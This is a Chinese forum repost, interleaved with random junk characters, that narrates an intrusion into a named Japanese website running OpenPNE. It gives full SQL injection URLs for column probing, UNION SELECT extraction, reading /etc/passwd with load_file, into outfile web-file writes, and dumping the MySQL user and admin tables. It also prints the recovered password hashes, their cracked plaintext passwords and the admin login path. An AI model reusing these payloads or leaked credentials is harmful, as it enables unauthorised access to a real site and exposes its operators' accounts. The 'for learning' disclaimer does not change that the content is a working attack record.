|
|
& S) o) M* S9 l
$ V' |& Q6 [5 j; f0x01. 检测 www.zuaa.jp 收集数据
; @* y0 l3 s2 t( p8 R; N; h, z' n+ N, k$ F- A. E* o, y! D
/ ?2 X( ?# n9 l, b; K& i4 {: c% J
whatweb+ w E! N9 X; E5 k; f' S6 C
* f* h7 c7 Y: \. D1 G
8 G2 R3 T6 H1 T6 Z* Z& V0 G: m利用NMAP扫描1 {) w$ b7 M L1 W B5 \
8 t4 v; c/ n; r6 l中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持- p7 E0 x/ S9 \0 L5 ?9 H
0x02.找注入点
$ n8 k+ O7 a* h6 g$ ~7 x5 T1 K- V找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
W, l' c3 ~ Z4 V
! f7 J% `6 {! s+ k- Z
: Z; {! ^8 ]8 L6 D7 g! O0x03.order by
+ W$ Y' \9 w0 R: s( O; s$ m http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 19 t+ b. N9 J2 r2 Q1 k
$ t# Z% A0 u8 I+ Y1 Q$ h1 ~3 f& porder by 28报错,order by 27正常* P, J6 m0 y5 @2 q) }
- y: Y0 x5 M1 Z" @. G0x04. union手动查询" L2 C1 a$ C+ g! V. T' L2 J
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 4 R; {+ V% E+ v9 T& ]7 s
添加到 27 时正常显示
) b7 v1 N g- x' s: e" q" t7 h5 x$ o; ?
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
0 C* X. a! x' F* B. A( W2 ~6 V
% O" o' k6 {1 |6 U, d* F3 u0x05. info:
7 }, _ R6 R6 V/ W: U7 z" S5 Ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ) s* B! F3 r# U. W
* ]; Z) Z7 @$ g' i+ a; T
user: root@localhost5 p3 z* l! n- u: i
database: openpne
, [: A2 _+ P' |4 ?0 X" mversion: 4.1.22
\1 I8 ^( x1 C8 U+ @) [! cos: portbld-freebsd5.4- k; L3 @/ V: [; D$ \9 _' c% B1 T
# i) |/ r2 O5 Y) z. W0x06. root用户
& v/ S9 s. s6 O/ _, q利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
P/ J6 q/ P7 I6 Phttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
# ?# U: w* E% T% A5 K& |+ g0 S
/ V7 u6 {/ k, {3 w8 K! E+ T5 u5 @- n通过工具转换- c2 v2 p- v( `9 l4 L- N! ^- t
# T6 O6 `1 Y- X5 V1 { Z4 c1 F$ r
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持: W& ? w. a4 N3 @* Z
- U" V1 ?. U0 y: u7 v8 M3 e
0x07. 利用 into outfile
5 M3 r7 `; d: K0 F* D6 J3 [2 }全部都失败
. I9 H8 q( A; a+ F, _+ hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php/ c+ m- U& H* ~& p
; C8 C) B+ x \, \http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
7 b: s J$ x" V! {' h5 o
! b6 w' x( ?2 p2 f2 ?7 W5 n页面显示“MDB2 Error:syntax error”, E0 f8 ~; C* \
6 N$ c: a/ R t$ r0 V' u1 S' J- l0x08. 利用 mysql 4.1
; i! W( G0 F3 }- [3 O2 o猜常规表名,字段未果 工具 sqlmap
. }0 Y' M: ]8 r ~1 e中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持3 M- r! ~, }9 [5 A7 [2 K: w
! I6 V6 ]6 i! [) D; U8 R$ @/ @1 R
3 f. p, A6 L/ \% ^8 ^4 K: Z
0x09. 查找后台7 O$ j3 n) @/ \% q% ^1 M6 |8 r
利用 现有的各种 后台工具尝试都不行
$ @, ~% t* i" v+ Z- r9 S" x" V6 d/ h) R- |& @$ o
0x10. MySL外联方法
9 B L0 v) P; u+ q- \从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
# C) I0 w! R! f% ~/ h可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user+ h& f/ L4 z6 J6 m
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user3 G) E$ D" l1 t0 K
* m/ T$ D; \; S& ~6 X这个可以在 www.cmd5.com 解密
( V2 @% v& j5 q7 P, Xroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
, w3 y i9 n& X8 R+ R/ bchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97* N& ^& I! W5 A8 s: h$ v
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
1 c m" h6 `. D( @zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
4 L. [3 @2 q$ {% i9 K工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知 }8 t8 V1 r8 m' _" Y
' P) b3 ?5 t9 _5 N2 c" }+ U# W5 V4 L5 D3 _5 h$ t/ v/ @0 o
0x11. 网站突破; f8 n% A; W/ B k: _: L1 I; _
发现网站的源程序 openpne, google 下载 openpne 源码( F* E' [2 _6 n
* `9 z( K: Y- y, ]
8 X2 D1 D/ L- M6 B X! S0 U3 o
0x12. 默认信息利用
+ |( }8 f# S& P, y. `, ]http://sns.zuaa.jp/?m=admin&a=page_login
/ m9 d& K/ D- Z" L4 a
6 N) L) c3 E$ C6 A+ Y3 N: O& o6 U表名 (c_admin_user) ,字段名(username,password)
0 {$ D# f: a* Y/ S) L @, c' Dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
. s( y+ j# I$ {9 A9 x5 S# W# c" D) Y
5 l2 |. b5 z2 H! b- F解密
3 a4 E& G3 j/ J# {. \zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009, O( K3 [4 @1 m
zuaajp:c0923ec5857796a393da99905008c176, zju18975 r' {: S( T: i- J
% n; q# o* ]. h( z0 J
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持9 i& s) F" w1 }9 v" X
8 N+ j0 x4 Q* p# a0x13. 登录后台9 t$ u+ _- K ]! h0 P5 m
3 c2 E# L- e( I3 A
0 w% D& l8 F& \0 d" W2 a, R
8 v( c5 t# g4 [, Q' j5 O0x14. 小结; P1 y9 ]. y6 s9 H/ ?- V, q5 r
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
& C7 q% w* m4 x# ?7 P感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点/ L4 i, R4 W9 `# Y5 Z" }* d3 o! L8 k
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
3 a2 e9 r1 @: x4 C+ P; i# i中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持4 a! f; w1 r& u ]9 y
/ e. C/ w2 h( v7 O* y+ [) K
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
4 W& f$ h. F9 A; r0 J/ M |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|